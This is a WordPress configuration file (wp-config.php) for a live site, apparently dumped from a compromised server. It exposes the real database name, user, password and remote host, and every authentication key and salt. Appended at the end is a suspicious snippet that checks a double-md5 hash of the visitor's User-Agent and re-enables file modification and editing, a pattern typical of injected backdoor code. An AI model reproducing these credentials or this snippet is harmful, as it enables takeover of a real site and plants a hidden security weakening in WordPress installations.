File: /home/storage/4/c5/67/alfalasercampina2/public_html/wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the web site, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * Database settings
* * Secret keys
* * Database table prefix
* * Localized language
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wpalfa' );
/** Database username */
define( 'DB_USER', 'wpalfa' );
/** Database password */
define( 'DB_PASSWORD', 'Alfa@laser2023' );
/** Database hostname */
define( 'DB_HOST', 'wpalfa.mysql.dbaas.com.br' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', 'K(iT+93:9oax$HOxF@pIhNy~0T@0@I6|QiZ_S`:W*BhvdN&*nqJQ637(/c9+6qE7' );
define( 'SECURE_AUTH_KEY', '10k0tXSTa@5MEeg%(9%s3T7d=`#k@:wu/++FxE^C,?T?Y[Qw{f4W|2{=De?;nj^V' );
define( 'LOGGED_IN_KEY', 'oC[1SwWxY?Sc~yj-@AeqHDbXC*Rq[3sr0<(57k3_z(N%DR7qW4:TmGDI%$&{zEe&' );
define( 'NONCE_KEY', 'P*91rSN_oY_vwc,Z}|(}4wk[Zn[Xq(d$[@YigD5uh:ZThklQa6b-4H0&YP4,%EvC' );
define( 'AUTH_SALT', 'Vdq(>syB}Q4Z3fH7^r+^<vVQK3me6Qkdl^SV=xop|0?o.d~(UZe73%4./6@<m]9W' );
define( 'SECURE_AUTH_SALT', '!EQS+I/]B2K?;ow[]+JcR*nUI2g^2P&]X6ytRm~`5t9;,cn8/ZO0`+3Q^]dD:+QY' );
define( 'LOGGED_IN_SALT', 'xFb*=>8h6a4lGJSS# &%FRSR!qV(Kz<pAbs^If#_lE8t<ol%[-d4=vk2O<[8=U6G' );
define( 'NONCE_SALT', '&*aDD01iqu#ykojI5+]k`(<[0>FM_)-.-zj?@:GQnxZdznWm#+Wa$~wm[$#Scck(' );
define( 'WP_CACHE_KEY_SALT', 'A?:`qvN(D2|+V,8oD1=Mz[|5r?cf73yxVM8]fdfw:}6U_xRb Iypp)N9Jc#vGonv' );
/**#@-*/
/**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = '';
/* Add any custom values between this line and the "stop editing" line. */
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/support/article/debugging-in-wordpress/
*/
if ( ! defined( 'WP_DEBUG' ) ) {
define( 'WP_DEBUG', false );
}
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){
define('DISALLOW_FILE_MODS', false);
define('DISALLOW_FILE_EDIT', false);
}